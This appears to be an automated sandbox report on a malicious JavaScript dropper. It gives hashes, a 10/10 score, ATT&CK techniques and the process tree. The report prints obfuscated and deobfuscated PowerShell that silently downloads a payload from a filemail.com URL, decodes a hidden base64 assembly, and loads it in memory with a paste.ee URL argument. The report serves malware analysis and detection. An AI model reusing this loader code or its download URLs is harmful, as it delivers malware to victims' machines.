7500c2ce57ca0f5d77facf03d2ecf4207552f164a34f2c4a802f0acfa053591f

General

Target

3f354bdb3557ffb64892e788c439adc0da9f7fd4f39b143a1cc2d8f7059b4488.js
Size

103KB
MD5

82bf71f9d463c60e2304cbf9f9cac022
SHA1

d54cce9d9a238310b00d154c9f35033e62ca1d81
SHA256

3f354bdb3557ffb64892e788c439adc0da9f7fd4f39b143a1cc2d8f7059b4488
SHA512

19bf4493c19a438fbd21266f012f21b22a2cf0448db22c41d9994afaa200a04a621968737953c12408f7d31e9c8c0bbd253e900823364210090e98a841b5004c
SSDEEP

3072:MHXp+q62Nhxdd5pdq61HXp+q62Nhxdd5pdqsVd0HXp+q62Nhxdd5pdq61HXp+q61:k3/13jc3/13+

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 784 powershell.exe
6 784 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

784 powershell.exe
2372 powershell.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2372 powershell.exe
784 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2372 powershell.exe
Token: SeDebugPrivilege 784 powershell.exe

flow	pid	process
5	784	powershell.exe
6	784	powershell.exe

pid	process
784	powershell.exe
2372	powershell.exe

pid	process
2372	powershell.exe
784	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	784	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.exepowershell.exe

description	pid	process	target process
PID 2232 wrote to memory of 2372	2232	wscript.exe	powershell.exe
PID 2232 wrote to memory of 2372	2232	wscript.exe	powershell.exe
PID 2232 wrote to memory of 2372	2232	wscript.exe	powershell.exe
PID 2372 wrote to memory of 784	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 784	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 784	2372	powershell.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\3f354bdb3557ffb64892e788c439adc0da9f7fd4f39b143a1cc2d8f7059b4488.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACgARwBlAFQALQBWAGEAcgBJAGEAQgBsAGUAIAAnACoAbQBkAFIAKgAnACkALgBOAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAE4AJwAnACkAKAAgACgAJwBjAHEAagBpAG0AYQBnAGUAVQByAGwAIAA9ACAAcABYAHoAaAB0AHQAcABzADoALwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAvAGEAcABpAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQA9ADIAQQBhAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5AHAAVAA5AHAAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAQwBmAEYAaABtAFQASwBqADMATABDADYAUwBRACcAKwAnAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2ACcAKwAnAGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHAAWAB6ADsAYwBxAGoAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACcAKwAnAGMAcQBqAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAYwBxAGoAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAGMAcQBqAGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAYwBxAGoAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAYwBxACcAKwAnAGoAaQBtAGEAZwBlAEIAeQB0AGUAcwApACcAKwAnADsAYwBxAGoAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcABYAHoAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBwAFgAegA7AGMAcQBqAGUAbgBkAEYAbABhAGcAIAA9ACAAcABYAHoAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHAAWAB6ADsAYwBxAGoAcwAnACsAJwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABjAHEAagBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeAAnACsAJwBPACcAKwAnAGYAKABjAHEAagBzAHQAYQByAHQARgBsAGEAZwApADsAYwBxAGoAZQBuAGQAJwArACcASQBuAGQAZQB4ACAAPQAgAGMAcQBqAGkAbQAnACsAJwBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AJwArACcAZgAoAGMAcQBqAGUAbgBkAEYAbABhAGcAKQA7AGMAcQAnACsAJwBqACcAKwAnAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAYwBxAGoAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIABjAHEAagBzAHQAYQByAHQASQBuAGQAZQB4ADsAYwBxAGoAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAGMAcQBqAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBjAHEAagBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABjAHEAagAnACsAJwBlAG4AZABJAG4AZABlAHgAIAAtACAAYwBxAGoAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGMAcQBqAGIAYQBzAGUANgA0AEMAbwAnACsAJwBtAG0AYQBuAGQAIAA9ACAAYwBxAGoAJwArACcAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACcAKwAnAGMAcQBqAHMAdABhAHIAdABJAG4AJwArACcAZABlAHgALAAnACsAJwAgAGMAcQBqAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBjAHEAagAnACsAJwBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABjAHEAagBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAgAG4AeABhACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAGMAcQBqAF8AIAB9ACkAWwAtADEALgAuAC0AKABjAHEAagBiAGEAcwBlADYANABDAG8AJwArACcAbQBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsAYwBxAGoAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGMAcQBqAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAApADsAYwBxAGoAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwAnACsAJwBuAC4AQQBzAHMAZQBtAGIAJwArACcAbAB5ACcAKwAnAF0AJwArACcAOgA6AEwAbwBhACcAKwAnAGQAKABjAHEAagBjAG8AbQBtAGEAJwArACcAbgBkAEIAeQB0AGUAcwApADsAYwBxAGoAdgBhAGkATQBlACcAKwAnAHQAaABvAGQAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoAHAAWAB6AFYAQQBJAHAAWAAnACsAJwB6ACkAOwBjAHEAagB2AGEAaQBNAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACcAKwAnACgAYwBxAGoAbgB1AGwAbAAsACAAQAAoAHAAWAB6ADAALwA4AGUAUgAnACsAJwBOAEcALwBkAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaABwAFgAegAsACAAcABYAHoAZABlAHMAYQB0AGkAdgBhAGQAbwBwAFgAegAsACAAcABYAHoAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBwAFgAegAsACAAcABYAHoAZABlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBwAFgAegAsACAAcABYAHoATQBTAEIAdQBpAGwAZABwAFgAegAsACAAcABYAHoAZABlACcAKwAnAHMAYQB0AGkAdgBhAGQAbwBwAFgAegAsACAAcABYAHoAZAAnACsAJwBlAHMAYQAnACsAJwB0AGkAdgBhAGQAbwBwAFgAegAsAHAAWAB6AGQAZQBzAGEAdABpAHYAYQBkAG8AcABYAHoALABwAFgAegBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWAB6ACwAcABYAHoAZABlAHMAYQB0AGkAdgBhAGQAbwBwAFgAegAsAHAAWAB6AGQAZQBzAGEAdABpAHYAYQBkAG8AcABYAHoALABwAFgAegBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWAB6ACwAcABYAHoAMQBwAFgAegAsAHAAWAB6AGQAZQAnACsAJwBzAGEAdABpAHYAYQBkAG8AcABYAHoAKQApADsAJwApAC4AcgBlAFAATABBAEMAZQAoACgAWwBDAEgAQQBSAF0AMQAxADAAKwBbAEMASABBAFIAXQAxADIAMAArAFsAQwBIAEEAUgBdADkANwApACwAJwB8ACcAKQAuAHIAZQBQAEwAQQBDAGUAKAAoAFsAQwBIAEEAUgBdADEAMQAyACsAWwBDAEgAQQBSAF0AOAA4ACsAWwBDAEgAQQBSAF0AMQAyADIAKQAsAFsAcwB0AHIAaQBOAGcAXQBbAEMASABBAFIAXQAzADkAKQAuAHIAZQBQAEwAQQBDAGUAKAAoAFsAQwBIAEEAUgBdADkAOQArAFsAQwBIAEEAUgBdADEAMQAzACsAWwBDAEgAQQBSAF0AMQAwADYAKQAsACcAJAAnACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VarIaBle '*mdR*').NaMe[3,11,2]-joIN'')( ('cqjimageUrl = pXzhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQ'+'tIcOc_T35w&pk_v'+'id=fd4f614bb209c62c1730945176a0904f pXz;cqjwebClient = New-Object System.Net.WebClient;'+'cqjimageBytes = cqjwebClient.DownloadData(cqjimageUr'+'l);cqjimageText = [System.Text.Encoding]::UTF8.GetString(cq'+'jimageBytes)'+';cqjstartFlag = pXz<<BASE64_START>>pXz;cqjendFlag = pXz<<BASE64_END>>pXz;cqjs'+'tar'+'tIndex = cqjimageText.Index'+'O'+'f(cqjstartFlag);cqjend'+'Index = cqjim'+'ageText.IndexO'+'f(cqjendFlag);cq'+'j'+'startIndex -ge 0 -and cqjendIndex -gt cqjstartIndex;cqjstartIndex += cqjstartFlag.Length;cqjbase64Length = cqj'+'endIndex - cqjstartIndex;cqjbase64Co'+'mmand = cqj'+'imageText.Substring('+'cqjstartIn'+'dex,'+' cqjbase64Length);cqj'+'base64Reversed = -join (cqjbase64Command.ToCharArray() nxa ForEach-Object { cqj_ })[-1..-(cqjbase64Co'+'mmand.Length)];cqjcommandBytes = [System.Convert]::FromBase64String(cqjbase64Reversed);cqjloadedAssembly = [System.Reflectio'+'n.Assemb'+'ly'+']'+'::Loa'+'d(cqjcomma'+'ndBytes);cqjvaiMe'+'thod = [dnlib.IO.Home].GetMethod(pXzVAIpX'+'z);cqjvaiMethod.Invoke'+'(cqjnull, @(pXz0/8eR'+'NG/d/ee.etsap//:sptthpXz, pXzdesativadopXz, pXzd'+'esativad'+'opXz, pXzdesativado'+'pXz, pXzMSBuildpXz, pXzde'+'sativadopXz, pXzd'+'esa'+'tivadopXz,pXzdesativadopXz,pXzdesativadopXz,pXzdesativadopXz,pXzdesativadopXz,pXzdesativadopXz,pXz1pXz,pXzde'+'sativadopXz));').rePLACe(([CHAR]110+[CHAR]120+[CHAR]97),'|').rePLACe(([CHAR]112+[CHAR]88+[CHAR]122),[striNg][CHAR]39).rePLACe(([CHAR]99+[CHAR]113+[CHAR]106),'$') )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7c36775ba349cbb6d0efe10657cf65c6

SHA1
091f2adc340d147f255e5bc33f922e7d38422615

SHA256
d0ec91e05ad68b35d8151e4265cff4fa84c4195a800d4a4da21c7d630f22bc2e

SHA512
62373b6d82240d76150fb60404c298677aa86db75a0466889574528257854d44e82e6b382e1ee8ac65912fad3acf912984f97b913b9afb5715cdeec0fa9a111f

Download Submit
memory/2372-4-0x000007FEF5C1E000-0x000007FEF5C1F000-memory.dmp

Filesize
4KB

Download
memory/2372-5-0x000000001B510000-0x000000001B7F2000-memory.dmp

Filesize
2.9MB

Download
memory/2372-6-0x00000000020C0000-0x00000000020C8000-memory.dmp

Filesize
32KB

Download
memory/2372-7-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

Filesize
9.6MB

Download
memory/2372-8-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

Filesize
9.6MB

Download
memory/2372-9-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

Filesize
9.6MB

Download
memory/2372-16-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

Filesize
9.6MB

Download
memory/2372-11-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

Filesize
9.6MB

Download
memory/2372-17-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing